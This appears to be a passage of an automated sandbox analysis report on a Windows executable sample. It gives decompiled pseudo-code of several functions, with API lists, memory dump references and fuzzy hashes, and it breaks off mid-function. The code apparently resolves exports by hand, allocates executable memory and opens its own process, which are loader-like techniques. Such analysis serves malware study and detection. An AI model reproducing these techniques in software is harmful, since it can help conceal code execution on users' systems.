                                                                                                                                                                        			E00401C6C(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t10;
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        				void* _t15;
                                                                                                                                                                        				signed int _t17;
                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                        				void* _t25;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(_t15);
                                                                                                                                                                        				_t8 = E00401BDE(_t15, __ecx, __edx, __eflags,  *0x40547c,  &_v8, 1);
                                                                                                                                                                        				_v12 = _t8;
                                                                                                                                                                        				if(_t8 != 0) {
                                                                                                                                                                        					 *0x405484 =  *0x405484 & 0x00000000;
                                                                                                                                                                        					__eflags =  *0x405484;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t17 = _v8;
                                                                                                                                                                        					_t22 = __imp__GetLongPathNameW;
                                                                                                                                                                        					_t10 =  *_t22(_t17, _t8, _t8); // executed
                                                                                                                                                                        					_t25 = _t10;
                                                                                                                                                                        					_t28 = _t25;
                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						 *0x405484 = _t17;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t5 = _t25 + 2; // 0x2
                                                                                                                                                                        						_push(_t25 + _t5);
                                                                                                                                                                        						_t12 = E004017EF(_t25 + _t5, _t17, _t28);
                                                                                                                                                                        						 *0x405484 = _t12;
                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                        							goto L4;
                                                                                                                                                                        						} else {
                                                                                                                                                                        							 *_t22(_t17, _t12, _t25); // executed
                                                                                                                                                                        							E00401759(_t17);
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _v12;
                                                                                                                                                                        			}














                                                                                                                                                                        0x00401c6f
                                                                                                                                                                        0x00401c70
                                                                                                                                                                        0x00401c71
                                                                                                                                                                        0x00401c80
                                                                                                                                                                        0x00401c87
                                                                                                                                                                        0x00401c8a
                                                                                                                                                                        0x00401cc8
                                                                                                                                                                        0x00401cc8
                                                                                                                                                                        0x00401c8c
                                                                                                                                                                        0x00401c8c
                                                                                                                                                                        0x00401c8f
                                                                                                                                                                        0x00401c98
                                                                                                                                                                        0x00401c9a
                                                                                                                                                                        0x00401c9c
                                                                                                                                                                        0x00401c9e
                                                                                                                                                                        0x00401cc0
                                                                                                                                                                        0x00401cc0
                                                                                                                                                                        0x00401ca0
                                                                                                                                                                        0x00401ca0
                                                                                                                                                                        0x00401ca4
                                                                                                                                                                        0x00401ca5
                                                                                                                                                                        0x00401cac
                                                                                                                                                                        0x00401cb1
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401cb3
                                                                                                                                                                        0x00401cb6
                                                                                                                                                                        0x00401cb9
                                                                                                                                                                        0x00401cb9
                                                                                                                                                                        0x00401cb1
                                                                                                                                                                        0x00401c9e
                                                                                                                                                                        0x00401cd6

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00401BDE: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,?,00000000,?,?,00401C85,?,00000001,?,00000000), ref: 00401C04
                                                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401C98
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401CB6
                                                                                                                                                                          • Part of subcall function 00401759: HeapFree.KERNEL32(00000000,?,00401640,?,00000000,?,00400000,00402F8E,00000000,?,00000000,00401829,?,00000000), ref: 00401765
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Name$HeapLongPath$AllocFileFreeModule
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3274793655-0
                                                                                                                                                                        • Opcode ID: d7036732f33cbc1196bba7b4d50375836e1a20677f6377a72e691aadefeb9ae2
                                                                                                                                                                        • Instruction ID: a4f025c43ab50e7ead91649edf19bbaa3c6ffac15d549e7b47d7d775a37e5c38
                                                                                                                                                                        • Opcode Fuzzy Hash: d7036732f33cbc1196bba7b4d50375836e1a20677f6377a72e691aadefeb9ae2
                                                                                                                                                                        • Instruction Fuzzy Hash: F5F06DB1514204BEE710AB669E85EAB7BECDB44359B00003AF901F7261E278ED009B78
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                        			E00401000(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				intOrPtr* _t57;
                                                                                                                                                                        				intOrPtr _t60;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                        				intOrPtr* _t77;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				CHAR* _t80;
                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                        				signed int _t88;
                                                                                                                                                                        				signed short* _t90;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				void* _t95;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0x2c);
                                                                                                                                                                        				_push(0x404148); // executed
                                                                                                                                                                        				E004031F0(__ebx, __edi, __esi); // executed
                                                                                                                                                                        				 *((intOrPtr*)(_t95 - 0x24)) = 0;
                                                                                                                                                                        				 *(_t95 - 4) = 0;
                                                                                                                                                                        				_t85 =  *((intOrPtr*)(_t95 + 8));
                                                                                                                                                                        				_t56 =  *((intOrPtr*)(_t85 + 0x3c)) + _t85;
                                                                                                                                                                        				if( *((short*)(_t56 + 4)) != 0x14c) {
                                                                                                                                                                        					_t57 = _t56 + 0x88;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t57 = _t56 + 0x78;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t94 =  *_t57 + _t85;
                                                                                                                                                                        				if( *_t57 == 0 ||  *((intOrPtr*)(_t57 + 4)) == 0 ||  *((intOrPtr*)(_t94 + 0x1c)) == 0) {
                                                                                                                                                                        					L27:
                                                                                                                                                                        					 *(_t95 - 4) =  *(_t95 - 4) | 0xffffffff;
                                                                                                                                                                        					return E0040322B( *((intOrPtr*)(_t95 - 0x24)));
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t60 =  *((intOrPtr*)(_t94 + 0x14));
                                                                                                                                                                        					if(_t60 != 0) {
                                                                                                                                                                        						_t79 =  *((intOrPtr*)(_t94 + 0x1c)) + _t85;
                                                                                                                                                                        						 *((intOrPtr*)(_t95 - 0x34)) = _t79;
                                                                                                                                                                        						_t88 =  *(_t95 + 0xc);
                                                                                                                                                                        						 *(_t95 - 0x20) = _t88;
                                                                                                                                                                        						if(_t88 == 0 || _t88 > 0xffff) {
                                                                                                                                                                        							 *(_t95 - 0x20) = 0;
                                                                                                                                                                        							_t60 =  *((intOrPtr*)(_t94 + 0x18));
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((intOrPtr*)(_t95 - 0x2c)) = _t60;
                                                                                                                                                                        						if( *((intOrPtr*)(_t94 + 0x24)) == 0) {
                                                                                                                                                                        							_t61 =  *(_t95 - 0x20);
                                                                                                                                                                        							if(_t61 != 0) {
                                                                                                                                                                        								 *((intOrPtr*)(_t95 - 0x24)) = _t79 + _t61 * 4 - 4;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L27;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t90 =  *((intOrPtr*)(_t94 + 0x24)) + _t85;
                                                                                                                                                                        						 *(_t95 - 0x3c) = _t90;
                                                                                                                                                                        						_t77 =  *((intOrPtr*)(_t94 + 0x20)) + _t85;
                                                                                                                                                                        						 *((intOrPtr*)(_t95 - 0x38)) = _t77;
                                                                                                                                                                        						 *(_t95 - 0x28) =  *(_t95 - 0x28) & 0x00000000;
                                                                                                                                                                        						while( *(_t95 - 0x28) <  *((intOrPtr*)(_t95 - 0x2c))) {
                                                                                                                                                                        							 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
                                                                                                                                                                        							if( *(_t95 - 0x20) == 0) {
                                                                                                                                                                        								_t65 =  *_t77 + _t85;
                                                                                                                                                                        								 *(_t95 - 0x30) = _t65;
                                                                                                                                                                        								_t80 =  *(_t95 + 0xc);
                                                                                                                                                                        								if(_t80 == 0) {
                                                                                                                                                                        									E00401935(lstrlenA(_t65),  *(_t95 - 0x30));
                                                                                                                                                                        									L19:
                                                                                                                                                                        									if(_t108 == 0) {
                                                                                                                                                                        										 *(_t95 - 0x1c) = 1;
                                                                                                                                                                        									}
                                                                                                                                                                        									L21:
                                                                                                                                                                        									if( *(_t95 - 0x1c) == 0) {
                                                                                                                                                                        										_t77 = _t77 + 4;
                                                                                                                                                                        										 *((intOrPtr*)(_t95 - 0x38)) = _t77;
                                                                                                                                                                        										_t90 =  &(_t90[1]);
                                                                                                                                                                        										 *(_t95 - 0x3c) = _t90;
                                                                                                                                                                        										 *(_t95 - 0x28) =  *(_t95 - 0x28) + 1;
                                                                                                                                                                        										_t85 =  *((intOrPtr*)(_t95 + 8));
                                                                                                                                                                        										continue;
                                                                                                                                                                        									}
                                                                                                                                                                        									 *((intOrPtr*)(_t95 - 0x24)) =  *((intOrPtr*)(_t95 - 0x34)) + ( *_t90 & 0x0000ffff) * 4;
                                                                                                                                                                        									if(0 != 0) {
                                                                                                                                                                        										 *((intOrPtr*)(0)) =  *_t77 +  *((intOrPtr*)(_t95 + 8));
                                                                                                                                                                        									}
                                                                                                                                                                        									goto L27;
                                                                                                                                                                        								}
                                                                                                                                                                        								if( *_t65 !=  *_t80) {
                                                                                                                                                                        									goto L21;
                                                                                                                                                                        								}
                                                                                                                                                                        								lstrcmpA(_t65, _t80); // executed
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t108 =  *(_t95 - 0x20) - ( *_t90 & 0x0000ffff) +  *((intOrPtr*)(_t94 + 0x10));
                                                                                                                                                                        							goto L19;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L27;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

















                                                                                                                                                                        0x00401000
                                                                                                                                                                        0x00401002
                                                                                                                                                                        0x00401007
                                                                                                                                                                        0x0040100e
                                                                                                                                                                        0x00401011
                                                                                                                                                                        0x00401014
                                                                                                                                                                        0x0040101a
                                                                                                                                                                        0x00401022
                                                                                                                                                                        0x00401029
                                                                                                                                                                        0x00401024
                                                                                                                                                                        0x00401024
                                                                                                                                                                        0x00401024
                                                                                                                                                                        0x00401030
                                                                                                                                                                        0x00401034
                                                                                                                                                                        0x00401143
                                                                                                                                                                        0x00401143
                                                                                                                                                                        0x0040114f
                                                                                                                                                                        0x0040104c
                                                                                                                                                                        0x0040104c
                                                                                                                                                                        0x00401051
                                                                                                                                                                        0x0040105a
                                                                                                                                                                        0x0040105c
                                                                                                                                                                        0x0040105f
                                                                                                                                                                        0x00401062
                                                                                                                                                                        0x00401067
                                                                                                                                                                        0x00401071
                                                                                                                                                                        0x00401074
                                                                                                                                                                        0x00401074
                                                                                                                                                                        0x00401077
                                                                                                                                                                        0x0040107d
                                                                                                                                                                        0x00401128
                                                                                                                                                                        0x0040112d
                                                                                                                                                                        0x00401133
                                                                                                                                                                        0x00401133
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040112d
                                                                                                                                                                        0x00401086
                                                                                                                                                                        0x00401088
                                                                                                                                                                        0x0040108e
                                                                                                                                                                        0x00401090
                                                                                                                                                                        0x00401093
                                                                                                                                                                        0x00401097
                                                                                                                                                                        0x004010a3
                                                                                                                                                                        0x004010ab
                                                                                                                                                                        0x004010ba
                                                                                                                                                                        0x004010bc
                                                                                                                                                                        0x004010bf
                                                                                                                                                                        0x004010c4
                                                                                                                                                                        0x004010e2
                                                                                                                                                                        0x004010ea
                                                                                                                                                                        0x004010ea
                                                                                                                                                                        0x004010ec
                                                                                                                                                                        0x004010ec
                                                                                                                                                                        0x004010f3
                                                                                                                                                                        0x004010f7
                                                                                                                                                                        0x00401112
                                                                                                                                                                        0x00401115
                                                                                                                                                                        0x00401119
                                                                                                                                                                        0x0040111a
                                                                                                                                                                        0x0040111d
                                                                                                                                                                        0x00401120
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401120
                                                                                                                                                                        0x00401102
                                                                                                                                                                        0x00401107
                                                                                                                                                                        0x0040110e
                                                                                                                                                                        0x0040110e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401107
                                                                                                                                                                        0x004010ca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004010ce
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004010d4
                                                                                                                                                                        0x004010b3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004010b3
                                                                                                                                                                        0x00401097
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00401051

                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcmpA.KERNEL32(?,?,00404148,0000002C,004018BB,77DF0000,00000000,77E5A3B0,?,00000000,?,?,004019C4,?,00000000), ref: 004010CE
                                                                                                                                                                        • lstrlenA.KERNEL32(?,00404148,0000002C,004018BB,77DF0000,00000000,77E5A3B0,?,00000000,?,?,004019C4,?,00000000), ref: 004010D9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmplstrlen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 898299967-0
                                                                                                                                                                        • Opcode ID: 7f11c4fab90abfa01e722fe00cac28f3f29e75b4c9a19731dcfea94b6951f67a
                                                                                                                                                                        • Instruction ID: ecc7765303b5585171c7bc493ad3cc43017e59271b9510c50ee32afaf6519d2a
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f11c4fab90abfa01e722fe00cac28f3f29e75b4c9a19731dcfea94b6951f67a
                                                                                                                                                                        • Instruction Fuzzy Hash: EB412571900259DFCB24CF99C8806AEB7F1BF49315F14853EE156BB7A0C338A981CB18
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 008003DA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.429106240.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                        • Opcode ID: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
                                                                                                                                                                        • Instruction ID: 5d631cf80fa6411d929cc2185aced16cc883c55bd1215ff6a89e1f5af6d183e4
                                                                                                                                                                        • Opcode Fuzzy Hash: c1a17069605dab7d48ac39e7c644e9b5868b307e3d54936d315e395ad9e50ff5
                                                                                                                                                                        • Instruction Fuzzy Hash: E801D873A00508ABE7618A19DC40F7B7359FFC5724F2AC525F906E73C1C575DC014AA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004012A3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
                                                                                                                                                                        				intOrPtr* _t5;
                                                                                                                                                                        				long _t6;
                                                                                                                                                                        				void* _t9;
                                                                                                                                                                        
                                                                                                                                                                        				_t5 =  *0x405020;
                                                                                                                                                                        				_t9 = 0;
                                                                                                                                                                        				if(_t5 == 0) {
                                                                                                                                                                        					_t6 = 0xc0000002;
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t1 =  &_a16; // 0x40306b
                                                                                                                                                                        					_t6 =  *_t5(_a4, _a8, _a12, 0x318,  *_t1);
                                                                                                                                                                        					if(_t6 < 0) {
                                                                                                                                                                        						L4:
                                                                                                                                                                        						SetLastError(RtlNtStatusToDosError(_t6));
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t9 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t9;
                                                                                                                                                                        			}






                                                                                                                                                                        0x004012a3
                                                                                                                                                                        0x004012a9
                                                                                                                                                                        0x004012ad
                                                                                                                                                                        0x004012cd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004012af
                                                                                                                                                                        0x004012af
                                                                                                                                                                        0x004012c4
                                                                                                                                                                        0x004012c8
                                                                                                                                                                        0x004012d2
                                                                                                                                                                        0x004012da
                                                                                                                                                                        0x004012ca
                                                                                                                                                                        0x004012ca
                                                                                                                                                                        0x004012ca
                                                                                                                                                                        0x004012c8
                                                                                                                                                                        0x004012e3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 004012D3
                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004012DA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$LastStatus
                                                                                                                                                                        • String ID: 0Lxt$k0@
                                                                                                                                                                        • API String ID: 4076355890-1244606833
                                                                                                                                                                        • Opcode ID: 5434e82f8a88ea654a0b4898add642c4918f5af8093b46366edd4c3ec384a360
                                                                                                                                                                        • Instruction ID: 7783ffe2bb385284acc0bf7fcf70b02c6e21f51b17b9e70f4ea8840bb5b38d27
                                                                                                                                                                        • Opcode Fuzzy Hash: 5434e82f8a88ea654a0b4898add642c4918f5af8093b46366edd4c3ec384a360
                                                                                                                                                                        • Instruction Fuzzy Hash: E4E08632204312ABC7014FE5AD08F4B7A98BB98780F00083DB741F11B1C674CC529BE9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E00401342() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        				long _t3;
                                                                                                                                                                        				void* _t4;
                                                                                                                                                                        				long _t5;
                                                                                                                                                                        				void* _t6;
                                                                                                                                                                        				intOrPtr _t8;
                                                                                                                                                                        				void* _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_t8 =  *0x40547c; // 0x400000
                                                                                                                                                                        				_t1 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                        				 *0x405488 = _t1;
                                                                                                                                                                        				if(_t1 == 0) {
                                                                                                                                                                        					return GetLastError();
                                                                                                                                                                        				}
                                                                                                                                                                        				_t3 = GetVersion();
                                                                                                                                                                        				if(_t3 != 5) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					if(_t12 <= 0) {
                                                                                                                                                                        						_t4 = 0x32;
                                                                                                                                                                        						return _t4;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					if(_t3 > 0) {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						 *0x405474 = _t3;
                                                                                                                                                                        						_t5 = GetCurrentProcessId();
                                                                                                                                                                        						 *0x405470 = _t5;
                                                                                                                                                                        						 *0x40547c = _t8;
                                                                                                                                                                        						_t6 = OpenProcess(0x10047a, 0, _t5);
                                                                                                                                                                        						 *0x40546c = _t6;
                                                                                                                                                                        						if(_t6 == 0) {
                                                                                                                                                                        							 *0x40546c =  *0x40546c | 0xffffffff;
                                                                                                                                                                        						}
                                                                                                                                                                        						return 0;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						_t12 = _t3 - _t3;
                                                                                                                                                                        						goto L4;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        			}










                                                                                                                                                                        0x00401343
                                                                                                                                                                        0x00401351
                                                                                                                                                                        0x00401359
                                                                                                                                                                        0x0040135e
                                                                                                                                                                        0x004013b0
                                                                                                                                                                        0x004013b0
                                                                                                                                                                        0x00401360
                                                                                                                                                                        0x00401368
                                                                                                                                                                        0x00401370
                                                                                                                                                                        0x00401370
                                                                                                                                                                        0x004013ac
                                                                                                                                                                        0x004013ae
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040136a
                                                                                                                                                                        0x0040136c
                                                                                                                                                                        0x00401372
                                                                                                                                                                        0x00401372
                                                                                                                                                                        0x00401377
                                                                                                                                                                        0x00401385
                                                                                                                                                                        0x0040138a
                                                                                                                                                                        0x00401390
                                                                                                                                                                        0x00401398
                                                                                                                                                                        0x0040139d
                                                                                                                                                                        0x0040139f
                                                                                                                                                                        0x0040139f
                                                                                                                                                                        0x004013a9
                                                                                                                                                                        0x0040136e
                                                                                                                                                                        0x0040136e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040136e
                                                                                                                                                                        0x0040136c

                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401997,?,00000000), ref: 00401351
                                                                                                                                                                        • GetVersion.KERNEL32(?,00000000), ref: 00401360
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401377
                                                                                                                                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401390
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 845504543-0
                                                                                                                                                                        • Opcode ID: 2b31826182439c7bc563c9da98cae4032967feea0fbdca8c799dc7a8ef19b915
                                                                                                                                                                        • Instruction ID: a75a0981205a0aef0128813cf753ba4515b65f77166c3807512c32f65c906ed5
                                                                                                                                                                        • Opcode Fuzzy Hash: 2b31826182439c7bc563c9da98cae4032967feea0fbdca8c799dc7a8ef19b915
                                                                                                                                                                        • Instruction Fuzzy Hash: 00F0AFB1A406008AE7209F38BE09BCA3B64E744722F444136EB84F61F0D37408828F0D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E004018E5(void* __ecx, intOrPtr _a4) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				char _v12;
                                                                                                                                                                        				intOrPtr* _t12;
                                                                                                                                                                        				long _t14;
                                                                                                                                                                        
                                                                                                                                                                        				_t12 =  *0x405024;
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				if(_t12 != 0) {
                                                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                                                        					_v12 = 0x318;
                                                                                                                                                                        					_t14 =  *_t12(_a4,  &_v8, 0,  &_v12, 0x3000, 0x40);
                                                                                                                                                                        					if(_t14 < 0) {
                                                                                                                                                                        						SetLastError(RtlNtStatusToDosError(_t14));
                                                                                                                                                                        						_v8 = _v8 & 0x00000000;
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}







                                                                                                                                                                        0x004018ea
                                                                                                                                                                        0x004018ef
                                                                                                                                                                        0x004018f5
                                                                                                                                                                        0x004018f7
                                                                                                                                                                        0x0040190f
                                                                                                                                                                        0x00401916
                                                                                                                                                                        0x0040191a
                                                                                                                                                                        0x00401924
                                                                                                                                                                        0x0040192a
                                                                                                                                                                        0x0040192a
                                                                                                                                                                        0x0040191a
                                                                                                                                                                        0x00401932

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040191D
                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00401924
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$LastStatus
                                                                                                                                                                        • String ID: 0Lxt
                                                                                                                                                                        • API String ID: 4076355890-409015746
                                                                                                                                                                        • Opcode ID: ae6a9ff42a6704fe3350159712505bdb44fb927150a880da70a33978377ce9b0
                                                                                                                                                                        • Instruction ID: 5cd16c7abfadac9f2b7ec20e46b4c78f3a45501f1426822d43c7ea4470398b3f
                                                                                                                                                                        • Opcode Fuzzy Hash: ae6a9ff42a6704fe3350159712505bdb44fb927150a880da70a33978377ce9b0
                                                                                                                                                                        • Instruction Fuzzy Hash: 58F05EB5A10308FBEB04CB91DE59FAE76BCEB04305F104058A300B6080DBB4AB00CB68
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040345D(long _a4) {
                                                                                                                                                                        				intOrPtr _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                        				short* _v32;
                                                                                                                                                                        				void _v36;
                                                                                                                                                                        				void* _t57;
                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                        				signed int _t62;
                                                                                                                                                                        				void* _t63;
                                                                                                                                                                        				signed int* _t68;
                                                                                                                                                                        				intOrPtr* _t69;
                                                                                                                                                                        				intOrPtr* _t71;
                                                                                                                                                                        				intOrPtr _t72;
                                                                                                                                                                        				intOrPtr _t75;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				signed int _t77;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void _t80;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				signed int _t84;
                                                                                                                                                                        				signed int _t86;
                                                                                                                                                                        				short* _t87;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				signed int* _t90;
                                                                                                                                                                        				long _t91;
                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                        				signed int _t100;
                                                                                                                                                                        				signed int _t102;
                                                                                                                                                                        				void* _t104;
                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                        				long _t108;
                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                        
                                                                                                                                                                        				_t108 = _a4;
                                                                                                                                                                        				_t76 =  *(_t108 + 8);
                                                                                                                                                                        				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                        					L3:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_a4 =  *[fs:0x4];
                                                                                                                                                                        				_v8 =  *[fs:0x8];
